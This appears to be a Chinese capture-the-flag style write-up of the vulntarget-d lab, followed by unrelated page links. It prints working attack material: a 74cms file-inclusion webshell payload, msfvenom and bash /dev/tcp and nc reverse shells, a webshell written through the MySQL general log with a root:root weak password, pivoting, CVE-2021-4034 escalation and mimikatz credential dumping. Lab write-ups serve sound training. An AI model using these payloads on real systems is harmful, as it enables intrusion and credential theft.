vulntarget-d

配置信息

系统 ip
kali 192.168.130.5
ubuntu 18 ip1: 192.168.130.8 ip2: 10.0.10.1
win7 10.0.10.134

网卡修改

ubuntu如果配置上双网卡没显示就如下操作:

// 修改配置文件

sudo vim /etc/network/interfaces

// 之后重启网络

sudo /etc/init.d/networking restart

文件内如下,也可以改成了静态的ip,这个随意。

最后用列出所有网卡查看修改的情况, 网卡配置完成。

实战

web打点

信息收集

发现了3306的MySQL有未授权,然后8888有个登录。

用fscan扫一下,发现8888那有个登录入口一眼宝塔, 81有个骑士cms。

在网页底部找到他的版本信息v6.0.20就可以去搜索历史漏洞。

骑士cms文件包含

去网上搜了利用的文章,先用post写入一句话。

variable=1&tpl=<?php fputs(fopen("110.php","w"),"<?php eval(\$_POST[110]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

然后开始包含日志文件,日志文件要和当天的日期一致。

variable=1&tpl=data/Runtime/Logs/Home/23_08_21.log

这里有个点,当写的文件名是shell.php的时候会被宝塔给拦截了但是去Ubuntu里面看确实是写入了,这里直接换个文件名就ok的。

内网渗透

Ubuntu提权

连上哥斯拉上来丝滑三连发现第二个网段,转战msf进行提权。

本来想偷懒直接用哥斯拉反弹过去的,但是效果不好一下就会断掉。

老老实实传msf上去。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.130.5 LPORT=6666 -f elf > 110.elf

handler -p linux/x86/meterpreter/reverse_tcp -H 192.168.130.5 -P 6666

下载提权脚本来看看入手点,但是很奇怪赋权之后执行了报错。先在msf这里挂个提权模块待会等结果。

run post/multi/recon/local_exploit_suggester

在哥斯拉里面试了一下发现了报错,出现这个原因一般是函数被ban了。

按前面的步骤写一个phpinfo(),可以看到被ban的还挺多的。

看了一下它上面有vim,然后也找到了php.ini可以试着改一手,先反弹shell过去。

bash -i >& /dev/tcp/192.168.130.5/9999 0>&1

有python环境升级交互式shell,定位到php.ini。

但是是真离谱进不了命令行模式进行移动,esc, Ctrl + [, Ctrl+o都不行,Ctrl+c就直接断了。

完全交互式shell

搜到一个升级到完全交互式shell的方法,先用这种方式反弹shell。然后还是正常的升级交互式shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.105 6667 >/tmp/f

python3 -c 'import pty;pty.spawn("/bin/bash")';

接着设置环境变量, Ctrl+z将shell发送到后台, 设置 shell 以通过反向 shell 发送控制字符和其他原始输入。使用以下stty命令来执行此操作。之后再输入reset。

export TERM=xterm    // 允许clear

Ctrl + z

stty raw -echo;fg

reset

然后此时就可以正常进入普通模式和命令模式,找到disable_functions的地方。

我真的服辣我是**。

回过头去看了一下msf的结果,有个cve-2021-4034

找到一个exp提权成功,exp传送门 GayHub - 全球最大 同性交友网站

流量转发

再运行之前的子上线msf,再创建路由入段(没找到chisel就寄希望于msf的socks试试)。

run autoroute -s 10.0.10.0/24

run autoroute -p

不成不成,太容易断了最后还是挂上frp,但是配置proxychains让fscan开扫扫不到一个?但是使用他内置的flag可以正常扫到。

这里可以看到除开本机和10.0.10.3, 就是10.0.10.2存活。

根据结果得知10.0.10.2是Win7,其他指纹信息没有什么有用的。

root@kali ~/Desktop » ./fscan_amd64 -h 10.0.10.1-128 -socks5 192.168.130.5:1515     

   ___                              _

  / _ \     ___  ___ _ __ __ _  ___| | __

 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /

/ /_\\_____\__ \ (__| | | (_| | (__|   <

\____/     |___/\___|_|  \__,_|\___|_|\_\

                     fscan version: 1.8.2

Socks5Proxy: socks5://192.168.130.5:1515

start infoscan

10.0.10.2:80 open

10.0.10.3:80 open

10.0.10.3:81 open

10.0.10.2:135 open

10.0.10.1:135 open

10.0.10.2:139 open

10.0.10.2:445 open

10.0.10.2:3306 open

10.0.10.3:3306 open

10.0.10.3:8080 open

10.0.10.3:888 open

10.0.10.3:1080 open

10.0.10.1:8082 open

10.0.10.3:8888 open

[*] alive ports len is: 14

start vulscan

[*] WebTitle: http://10.0.10.3          code:200 len:1326   title:没有找到站点

[*] NetInfo:

[*]10.0.10.1

   [->]Lockly

   [->]172.31.224.1

   [->]192.168.130.1

   [->]10.0.10.1

   [->]192.168.43.233

   [->]240e:468:f2f3:21c0:32c5:5ebe:ccd1:1d9

   [->]240e:468:f2f3:21c0:c9f6:cb76:c5d6:839d

[*] WebTitle: http://10.0.10.2          code:200 len:11     title:None

[*] WebTitle: http://10.0.10.3:8080     code:404 len:9      title:None

[*] 10.0.10.2  (Windows 7 Ultimate 7601 Service Pack 1)

[*] WebTitle: http://10.0.10.3:888      code:404 len:548    title:404 Not Found

[*] WebTitle: http://10.0.10.3:81       code:200 len:127210 title:骑士PHP高端人才系统(www.74cms.com)

[*] WebTitle: http://10.0.10.3:8888     code:302 len:219    title:Redirecting... 跳转url: http://10.0.10.3:8888/login

[*] NetInfo:

[*]10.0.10.2

   [->]WIN-D4S86JO2R26

   [->]10.0.10.2

[*] WebTitle: http://10.0.10.1:8082     code:400 len:18     title:None

已完成 14/14

[*] 扫描结束,耗时: 4m45.627909432s

这里奇怪的就是proxychains firefox是能正常访问到10.0.10.2他的站点的,但是挂给工具扫就是没用

真是鬼来了dirb和dirsearch走proxychains又是正常的,nmap,fscan一概扫不到。dirb结果有一个php探针和phpmyadin的登录页面。

除开这两个然后在dirb中还有一个l.php。

这个l.php是个php探针,底下连接数据库那里弱口令root:root一尝试就出来了。

全局日志写入一句话

查看全局日志是否开启,这里的原始位置可以留个记录,后续写完之后复原日志善始善终,但是这里显示有点问题我就没负责了。

SHOW GLOBAL VARIABLES LIKE '%general%';

开启全局日志,之后查看一下确认开了就OK。

SET GLOBAL GENERAL_LOG=ON;

SET GLOBAL GENERAL_LOG_FILE = 'C:/phpstudy/PHPTutorial/www/t.php';

将子写入日志。

select '<?php eval($_POST["hi"]);?>'

可以访问到t.php,连接上就没问题。

免杀上线

发现里面有火绒,要考虑做一下免杀。

免杀有时效性就没记录了,这台机器不出网,所以要用正向马。然后上传免杀之后,开启监听拿到了会话。

handler -p windows/meterpreter/bind_tcp -H 10.0.10.2 -P 4444

后续的图忘了截了,将进程迁移到64位上。用mimikatz抓密码,3389上才艺上去一眼就能看到flag。

vulntarget-d-wp的更多相关文章

  1. 逆天通用水印支持Winform,WPF,Web,WP,Win10。支持位置选择(9个位置 ==》[X])

    常用技能:http://www.cnblogs.com/dunitian/p/4822808.html#skill 逆天博客:http://dnt.dkil.net 逆天通用水印扩展篇~新增剪贴板系列 ...

  2. wp已死,metro是罪魁祸首!

    1.这篇文章肯定会有类似这样的评论:“我就是喜欢wp,我就是喜欢metro,我就是软粉“等类似的信仰论者发表的评论. 2.2014年我写过一篇文章,windows phone如何才能在中国翻身? 我现 ...

  3. 关于 WP 开发中.xaml 与.xaml.cs 的关系

    今天我们先来看一下在WP8.1开发中最长见到的几个文件之间的关系.比较论证,在看这个问题之前我们简单看看.NET平台其他两个不同的框架: Windows Forms 先看看Window Forms中的 ...

  4. Android,ios,WP三大手机系统对比

    从前,我以为.一个手机系统只是一个系统的UI风格,没什么不同的.然而,在我混合使用这三个手机系统之后,才明白,一个手机系统远不只一个UI那么简单,而真的是可以称之为一个“生态”. 首先祭出三台经典设备 ...

  5. 搜狗输入法wp风格皮肤

    换了个nexus 发现输入法真的没有wp的好用 没办法,刚好搜狗输入法有定制皮肤的选项,所以自己做了个wp风格的输入法皮肤. 一点微小的工作 http://pan.baidu.com/s/1kVsHd ...

  6. 免费获取WP之类的开发者权限或免费使用Azure 2015-10-19

    上一次弄wp真机调试的时候,卡住了,这里讲一下怎么解决(http://www.cnblogs.com/dunitian/p/4870959.html) 进这个网址注册一下:https://www.dr ...

  7. 【WP开发】读写剪贴板

    在WP 8.1中只有Silverlight App支持操作剪贴板的API,Runtime App并不支持.不过,在WP 10中也引入了可以操作剪贴板的API. 顺便说点题外话,有人会说,我8.1的开发 ...

  8. 【WP开发】不同客户端之间传输加密数据

    在上一篇文章中,曾说好本次将提供一个客户端之间传输加密数据的例子.前些天就打算写了,只是因一些人类科技无法预知的事情发生,故拖到今天. 本示例没什么技术含量,也没什么亮点,Bug林立,只不过提供给有需 ...

  9. 【WP开发】加密篇:双向加密

    说起双向加密,如果以前在.NET开发中弄过加/解密的朋友都不会陌生,常用的算法有DES.AES等.在RT应用程序中,也提供了加密相关的API,算法自然是一样的,只是API的封装方式不同罢了,因为RT不 ...

  10. 【WP 8.1开发】How to 图像处理

    在今天的吹牛节目开始之前,先交代一件事: 关于玩WP 8.1开发所使用的VS版本问题.对版本的要求是2013的Update2,这是最低要求,只要是这个版本或以上都可以,而update3,update4 ...

随机推荐

  1. 小知识:vi 查找如何不区分大小写

    在使用vi查找数据库的truncate记录日志时,发现对应语句夹杂了大小写,不够规范: 而vi默认查找是区分大小写的,如何不区分大小写查找指定内容呢? 有两种方式: (1)在查找指令后面额外加上\c标 ...

  2. Vue-基本语法及事件绑定

    一.基本语法 v-bind绑定: 双大括号不能在 HTML attributes 中使用.想要响应式地绑定一个 attribute,应该使用 v-bind 指令 代码展示: <div id=&q ...

  3. Merkle Tree 简介

    Merkle 树(Merkle Tree)是一种树状数据结构,通常用于验证大规模数据集的完整性和一致性.它的名字来源于其发明者 Ralph Merkle.Merkle 树在密码学.分布式系统和区块链等 ...

  4. 探索Lighthouse性能分数计算背后的奥秘

    作为开发我们都知道,页面性能很重要,一个性能良好的页面可以给用户带来非常好的用户体验.那么,怎么能知道自己写的页面性能是好是坏呢? Lighthouse 是Chrome提供给开发者用来测量页面性能的工 ...

  5. MySQL系列之——索引作用、索引的种类、B树、聚簇索引构建B树、辅助索引(S)构建B+树、辅助索引细分、索引树的高度、索引的基本管理、执行计划获取及分析、索引应用规范、优化器针对索引、问题汇总

    文章目录 一 索引作用 二 索引的种类(算法) 三 B树 基于不同的查找算法分类介绍 B 树 B+树 B*树 四 在功能上的分类 4.1 聚簇索引构建B树(簇就是区) 4.1.1 前提 4.1.2 作 ...

  6. 深度学习 YOLO v1 源码+笔记

    """ Yolo V1 by tensorflow """ import numpy as np import tensorflow._ap ...

  7. [SWPUCTF 2021 新生赛]老鼠走迷宫(详细版

    附件下载 https://wwvc.lanzouj.com/iYLez1br84jg 解题思路 用pyinstxtrator解析exe 重点:将无后缀的5先修改后缀为pyc,然后随便找一个pyc文件补 ...

  8. C#/.NET/.NET Core优秀项目和框架精选(2023年10月更新,项目分类已整理完成欢迎大家踊跃提交PR一起完善让优秀的项目和框架不被埋没)

    前言 帮助开发者发现功能强大.性能优越.创新前沿.简单易用的C#/.NET/.NET Core优秀项目和框架,无论你是寻找灵感.学习新技术.改进代码质量,还是想拓展自己的技术视野,都能为你提供有价值的 ...

  9. AtCoder Beginner Contest 321(ABC321)

    A. 321-like Checker 直接模拟. Code B. Cutoff 直接暴力枚举 \([0\sim100]\),每次把第 \(n\) 个数当作当前枚举的 \(i\),然后看看条件是否满足 ...

  10. JavaScript用策略模式消除if else 和 switch

    js程序中最常用的if else循环,如果分枝很多的的情况下难免使写出的程序又臭又长,但是根据需求又必须将这些分支处理,此时稍有经验的程序员可能会想到用switch case优化但是只是仅仅做到利于阅 ...